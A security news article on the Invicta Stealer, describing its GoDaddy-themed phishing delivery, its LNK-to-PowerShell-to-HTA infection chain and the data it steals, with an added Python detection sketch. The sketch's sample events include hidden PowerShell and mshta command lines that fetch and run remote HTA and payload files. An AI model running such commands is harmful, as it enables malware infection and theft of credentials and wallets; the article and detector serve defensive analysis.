The Invicta malware has been causing havoc in the cybersecurity industry due to its ability to steal sensitive information from unsuspecting users. The malware operates by collecting system data, hardware information, wallet data, browser data, and information from applications like Steam and Discord.
According to reports from Cyble Research and Intelligence Labs (CRIL), the creator of Invicta malware is highly active on social networking sites, using them to advertise the malware's capabilities. The hacker has even created a free open-source version of Invicta malware, which is available on GitHub.
Researchers at CRIL have observed a significant increase in the prevalence of Invicta Stealer because its builder is available on the GitHub page. Cybercriminals are actively using it to infect unsuspecting users. The malware is delivered through phishing emails, which trick users into downloading it.
Phishing emails are a common tool hackers use to deceive customers into downloading malware. One of the most commonly impersonated messages is the GoDaddy refund email.
The infection starts with a spam email that contains a misleading HTML page intended to fool recipients into thinking it is an actual refund invoice from GoDaddy. Users who view the phishing HTML page are immediately taken to a Discord URL, where they can download the “Invoice.zip” file.
Inside the “Invoice.zip” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. When the user opens this .LNK file, it triggers a PowerShell command that runs an .HTA file hosted on the threat actor's (TA's) Discord server. This HTA file contains VBScript code, which in turn runs a PowerShell script. The PowerShell script downloads the Invicta Stealer.
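The chain described above (shortcut, PowerShell, remote HTA, second PowerShell) leaves a recognizable parent/child process pattern in process-creation logs. The following detection sketch is an added example, not code from CRIL or the original report; the event tuples are constructed, the Discord attachment hostnames are an assumption (the report only says "Discord URL"), and all paths are placeholders.

```python
import re
from urllib.parse import urlparse

# Assumption: the page only says "Discord URL"; these are Discord's attachment hosts.
DISCORD_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
URL = re.compile(r"https?://[^\s\"']+")

# Constructed process-creation events: (parent image, image, command line).
# Hosts other than Discord's and all paths are placeholders.
EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden mshta https://cdn.discordapp.com/attachments/<id>/a.hta"),
    ("powershell.exe", "mshta.exe",
     "mshta.exe https://cdn.discordapp.com/attachments/<id>/a.hta"),
    ("mshta.exe", "powershell.exe",
     "powershell.exe -c <script fetching https://example.invalid/payload>"),
    ("explorer.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ("explorer.exe", "mshta.exe", "mshta.exe C:\\Tools\\inventory.hta"),
]

def classify(parent, image, cmdline):
    """Return the stages of the LNK -> PowerShell -> HTA -> PowerShell chain an event matches."""
    parent, image, cmd = parent.lower(), image.lower(), cmdline.lower()
    urls = URL.findall(cmd)
    hits = []
    # Stage 1: a shortcut opened from Explorer starts PowerShell, which invokes an HTA.
    if parent == "explorer.exe" and image == "powershell.exe" and ("mshta" in cmd or ".hta" in cmd):
        hits.append("lnk_powershell_to_hta")
    # Stage 2: mshta.exe is handed a remote URL instead of a local file.
    if image == "mshta.exe" and urls:
        hits.append("mshta_remote_hta")
    # Stage 3: script inside the HTA starts another script host.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        hits.append("hta_spawns_script_host")
    # Context: content pulled from Discord's attachment hosts.
    if any(urlparse(u).hostname in DISCORD_HOSTS for u in urls):
        hits.append("discord_hosted_content")
    return hits

def chain_detected(events):
    """True when all three process stages appear in order in the event list."""
    wanted = ["lnk_powershell_to_hta", "mshta_remote_hta", "hta_spawns_script_host"]
    for ev in events:
        if wanted and wanted[0] in classify(*ev):
            wanted.pop(0)
    return not wanted

if __name__ == "__main__":
    for ev in EVENTS:
        print(classify(*ev), ev[2])
    print("chain detected:", chain_detected(EVENTS))
```

The last two sample events are benign look-alikes (a local script and a local HTA) and match no stage, which is the distinction the rules are meant to preserve.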
After the malware is downloaded, it gathers sensitive information from the infected devices. The list of targeted web browsers includes Google Chrome, Mozilla Firefox, and Microsoft Edge. The malware also targets cryptocurrency wallets, including Bitcoin, Litecoin, Ethereum, and Ripple.
The Invicta Stealer can steal crucial information such as active gaming sessions, usernames, and a comprehensive list of games installed by the user on the system. It can also target the less popular but still expected KeePass password manager application.
Because it can target numerous types of extremely sensitive information across different applications and browsers, the Invicta Stealer is a particularly formidable danger. Attackers can use the stolen information to launch attacks on other people or companies, as well as for their own financial gain.
It is essential to recognize the seriousness of this threat and take the necessary precautions to safeguard against such nefarious acts.
